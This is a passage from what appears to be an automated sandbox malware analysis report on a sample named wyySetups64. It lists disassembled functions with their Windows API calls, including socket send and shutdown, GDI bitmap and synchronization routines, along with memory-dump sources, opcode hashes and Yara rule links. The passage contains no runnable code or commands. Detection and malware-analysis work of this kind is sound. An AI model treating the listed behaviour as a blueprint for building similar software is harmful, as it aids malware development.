                                                                                                                                                                                                              • _memset.LIBCMT ref: 03379CBB
                                                                                                                                                                                                                • Part of subcall function 0337A610: GetObjectW.GDI32(?,00000054,?), ref: 0337A62E
                                                                                                                                                                                                              • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 03379CD3
                                                                                                                                                                                                              • _free.LIBCMT ref: 03379CE4
                                                                                                                                                                                                              • _free.LIBCMT ref: 03379D23
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1756752955-0
                                                                                                                                                                                                              • Opcode ID: bc2bebcccc9a0edc6665aaa64e8256ba659b40b11fd59db5e803b5b0026c90b8
                                                                                                                                                                                                              • Instruction ID: 060834537fdcbd2a44c9aa46b8d3d5da9efc5de5d7f0bec6aeab27cdd2ce4c39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc2bebcccc9a0edc6665aaa64e8256ba659b40b11fd59db5e803b5b0026c90b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD31A3B2600706ABE720DF25DDC0B56B7E8BF49310F04863AD909CB650E7B5E454CB91
                                                                                                                                                                                                              Function 00BD5060 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000002FF), ref: 00BD50AA
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000139F), ref: 00BD50C2
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 00BD50CC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4082018349-0
                                                                                                                                                                                                              • Opcode ID: 41f9fe1f0bfb8a5ba5ca849a03a78ac5c01e2cef72fb90d92207b99c2f8e609a
                                                                                                                                                                                                              • Instruction ID: 697f5c228805b08c5bdb12333e363a021a6713b8fdae63995980b6e691a31574
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41f9fe1f0bfb8a5ba5ca849a03a78ac5c01e2cef72fb90d92207b99c2f8e609a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1316E76A04A44EBD720CF95ED86F6AB3E8FB48715F00495AF905C7781EB76A800CB90
                                                                                                                                                                                                              Function 03375080 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000002FF), ref: 033750CA
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000139F), ref: 033750E2
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 033750EC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4082018349-0
                                                                                                                                                                                                              • Opcode ID: 4bc8bff3a406ea97d1dc9b889fc5b45a75e96e41918465bff976bc79d863cb88
                                                                                                                                                                                                              • Instruction ID: 149fe003f7a3b7382fd9eac17e1650bf17bbc3a22e0498301eeb2743e40d0569
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bc8bff3a406ea97d1dc9b889fc5b45a75e96e41918465bff976bc79d863cb88
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE316C76A04748EBEB24DF55DDC5B6BB3ACEB49711F00495AE916C7680E73AA800CB90
                                                                                                                                                                                                              Function 00BD485A Relevance: 9.1, APIs: 6, Instructions: 91sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 00BD48E1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 00BD48EC
                                                                                                                                                                                                              • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 00BD48F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00BD4914
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00BD491D
                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 00BD492E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 640476663-0
                                                                                                                                                                                                              • Opcode ID: 35710c1c36bd65ff89a9c289a0b4af489b3416b06fbd09113e3f106b587ee15c
                                                                                                                                                                                                              • Instruction ID: 7c1e0574f68da02b60e635939754889b7f1b33aa6d2efec7d12648adb7e1405e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35710c1c36bd65ff89a9c289a0b4af489b3416b06fbd09113e3f106b587ee15c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B219A721046848BC720EBA8DC88987F3F9FF857647140B59F2948B392C7349C05CBA4
                                                                                                                                                                                                              Function 00BE36A3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 00BE36CB
                                                                                                                                                                                                                • Part of subcall function 00BE325B: __getptd.LIBCMT ref: 00BE3269
                                                                                                                                                                                                                • Part of subcall function 00BE325B: __getptd.LIBCMT ref: 00BE3277
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE36D5
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE36E3
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE36F1
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE36FC
                                                                                                                                                                                                              • _CallCatchBlock2.LIBCMT ref: 00BE3722
                                                                                                                                                                                                                • Part of subcall function 00BE3300: __CallSettingFrame@12.LIBCMT ref: 00BE334C
                                                                                                                                                                                                                • Part of subcall function 00BE37C9: __getptd.LIBCMT ref: 00BE37D8
                                                                                                                                                                                                                • Part of subcall function 00BE37C9: __getptd.LIBCMT ref: 00BE37E6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1602911419-0
                                                                                                                                                                                                              • Opcode ID: 1dadeaccc8c238386d51fe6cfb1d703d6e0afd33a2f2936b1a4b7805af0e0710
                                                                                                                                                                                                              • Instruction ID: 1b956c6fd4d7262788fe92f078a80aee1314ec1be17a04335faaf520e6e893eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1dadeaccc8c238386d51fe6cfb1d703d6e0afd33a2f2936b1a4b7805af0e0710
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F11DAB1D04249DFDB00EFA5D845AADBBF1FF04314F1084AAF868A7351EB389A159F50
                                                                                                                                                                                                              Function 033905AE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 033905D6
                                                                                                                                                                                                                • Part of subcall function 033900B7: __getptd.LIBCMT ref: 033900C5
                                                                                                                                                                                                                • Part of subcall function 033900B7: __getptd.LIBCMT ref: 033900D3
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 033905E0
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 033905EE
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 033905FC
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 03390607
                                                                                                                                                                                                              • _CallCatchBlock2.LIBCMT ref: 0339062D
                                                                                                                                                                                                                • Part of subcall function 0339015C: __CallSettingFrame@12.LIBCMT ref: 033901A8
                                                                                                                                                                                                                • Part of subcall function 033906D4: __getptd.LIBCMT ref: 033906E3
                                                                                                                                                                                                                • Part of subcall function 033906D4: __getptd.LIBCMT ref: 033906F1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1602911419-0
                                                                                                                                                                                                              • Opcode ID: 862cfdbe64fce7dbd0d94a6b668e93aa1c835855f9061bfc24ef08d2b1b86ca8
                                                                                                                                                                                                              • Instruction ID: 90ad418182500fcef025726369ea03d39c74f62546801a34df6eaaf693138634
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 862cfdbe64fce7dbd0d94a6b668e93aa1c835855f9061bfc24ef08d2b1b86ca8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0811D7B9D0130ADFDF10EFA4D485AADBBB0FF04714F10806AE825AB350DB789A559F50
                                                                                                                                                                                                              Function 0320FF6D Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 0320FF95
                                                                                                                                                                                                                • Part of subcall function 0320FA76: __getptd.LIBCMT ref: 0320FA84
                                                                                                                                                                                                                • Part of subcall function 0320FA76: __getptd.LIBCMT ref: 0320FA92
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0320FF9F
                                                                                                                                                                                                                • Part of subcall function 0320381A: __getptd_noexit.LIBCMT ref: 0320381D
                                                                                                                                                                                                                • Part of subcall function 0320381A: __amsg_exit.LIBCMT ref: 0320382A
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0320FFAD
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0320FFBB
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0320FFC6
                                                                                                                                                                                                              • _CallCatchBlock2.LIBCMT ref: 0320FFEC
                                                                                                                                                                                                                • Part of subcall function 0320FB1B: __CallSettingFrame@12.LIBCMT ref: 0320FB67
                                                                                                                                                                                                                • Part of subcall function 03210093: __getptd.LIBCMT ref: 032100A2
                                                                                                                                                                                                                • Part of subcall function 03210093: __getptd.LIBCMT ref: 032100B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1602911419-0
                                                                                                                                                                                                              • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                                                                                                              • Instruction ID: 59944461c995fa656a8a540bb002e19a6fb7a317082d233b9e245bb023b121af
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D11F679D10309DFDB00EFA4D984AED7BB0FF08310F10C0A9E914AB291DB789A959F50
                                                                                                                                                                                                              Function 00BDD9BE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BDD9CA
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00BDD9EA
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00BDD9FA
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00BDDA17
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BDDA2A
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(02851658), ref: 00BDDA42
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3470314060-0
                                                                                                                                                                                                              • Opcode ID: 9013e588c47e6f2d5ad9f2f0280badfb257dc267d3d0ab7caf59ce539656b468
                                                                                                                                                                                                              • Instruction ID: faa7c9d5df0e230c5f1ed45ca2bd81b5e264a5e098bef0d89032b6b951776ab7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9013e588c47e6f2d5ad9f2f0280badfb257dc267d3d0ab7caf59ce539656b468
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA01C472945A219BC721AFB4984579DF7E1EF00720F044197F8946B381EB346941CBD5
                                                                                                                                                                                                              Function 03384885 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 03384891
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 033848B1
                                                                                                                                                                                                              • __lock.LIBCMT ref: 033848C1
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 033848DE
                                                                                                                                                                                                              • _free.LIBCMT ref: 033848F1
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(03521658), ref: 03384909
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3470314060-0
                                                                                                                                                                                                              • Opcode ID: 5e6b918aec1dff99292612737626acd43dd1ad4712911b1655a1f4d261edf375
                                                                                                                                                                                                              • Instruction ID: 804909ed4664208f89d896188ddf56c88b6390d31f5cd14e2339a02e96ef11ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e6b918aec1dff99292612737626acd43dd1ad4712911b1655a1f4d261edf375
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0201D635D01B57EBE720FF2698C575DB3A4BF04B21F08040AE850ABA84CB756541CBD2
                                                                                                                                                                                                              Function 00BD48C7 Relevance: 9.0, APIs: 6, Instructions: 44sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 00BD48E1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 00BD48EC
                                                                                                                                                                                                              • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 00BD48F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00BD4914
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00BD491D
                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 00BD492E
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: GetCurrentThreadId.KERNEL32 ref: 00BD3F65
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: send.WS2_32(?,00BE7440,00000010,00000000), ref: 00BD3FC6
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: SetEvent.KERNEL32(?), ref: 00BD3FE9
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00BD3FF5
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: WSACloseEvent.WS2_32(?), ref: 00BD4003
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: shutdown.WS2_32(?,00000001), ref: 00BD401B
                                                                                                                                                                                                                • Part of subcall function 00BD3F60: closesocket.WS2_32(?), ref: 00BD4025
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1019945655-0
                                                                                                                                                                                                              • Opcode ID: 93cafdc9b73908511710c78d7bdfee4c97ca560808e0c63c2cffdc0df655b4c3
                                                                                                                                                                                                              • Instruction ID: a98db7289631b788eb759541ece9a7f2d5201627013bb26a0e281eeaebf6f7e0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93cafdc9b73908511710c78d7bdfee4c97ca560808e0c63c2cffdc0df655b4c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CF090322046045BC220EBAADC84D4BF3E9EFC9720B204B19F26987791CA74FC018BA4
                                                                                                                                                                                                              Function 03379BA0 Relevance: 9.0, APIs: 6, Instructions: 42COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 03379BD2
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379BE3
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379BF8
                                                                                                                                                                                                              • GdiplusShutdown.GDIPLUS(00000000,?,?,?,03379B7B), ref: 03379C04
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379C15
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379C1C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4268643673-0
                                                                                                                                                                                                              • Opcode ID: 5724694980b5267d822ebbaae3eb62a6436dd51f7ee3e9b199279695c00d3311
                                                                                                                                                                                                              • Instruction ID: 8d6a0d9df0d7452f01399675e6c806668783414a902646d8f5060bb3a7b81825
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5724694980b5267d822ebbaae3eb62a6436dd51f7ee3e9b199279695c00d3311
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA0108B1901709EFDF14FF6A98D4415BBA8BA4932677586AFE118CA206C372C403CB94
                                                                                                                                                                                                              Function 033748D0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 033748E1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 033748EC
                                                                                                                                                                                                              • Sleep.KERNEL32(00000258), ref: 033748F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03374914
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0337491D
                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C), ref: 0337492E
                                                                                                                                                                                                                • Part of subcall function 03373F60: GetCurrentThreadId.KERNEL32 ref: 03373F65
                                                                                                                                                                                                                • Part of subcall function 03373F60: send.WS2_32(?,033949C0,00000010,00000000), ref: 03373FC6
                                                                                                                                                                                                                • Part of subcall function 03373F60: SetEvent.KERNEL32(?), ref: 03373FE9
                                                                                                                                                                                                                • Part of subcall function 03373F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03373FF5
                                                                                                                                                                                                                • Part of subcall function 03373F60: WSACloseEvent.WS2_32(?), ref: 03374003
                                                                                                                                                                                                                • Part of subcall function 03373F60: shutdown.WS2_32(?,00000001), ref: 0337401B
                                                                                                                                                                                                                • Part of subcall function 03373F60: closesocket.WS2_32(?), ref: 03374025
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1019945655-0
                                                                                                                                                                                                              • Opcode ID: c622382f6bbda0ef2a80b2d142595d9971f47fe84af6eaed1b56e528a2f77925
                                                                                                                                                                                                              • Instruction ID: fd590d2752c1e2788ceb2e219662da0935431f56746ed67a419599902b984e84
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c622382f6bbda0ef2a80b2d142595d9971f47fe84af6eaed1b56e528a2f77925
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90F03676204609ABC624EB69DCC4D47F3E9EFC9720B154B09E265C7294CA75F801CBA0
                                                                                                                                                                                                              Function 03373300 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
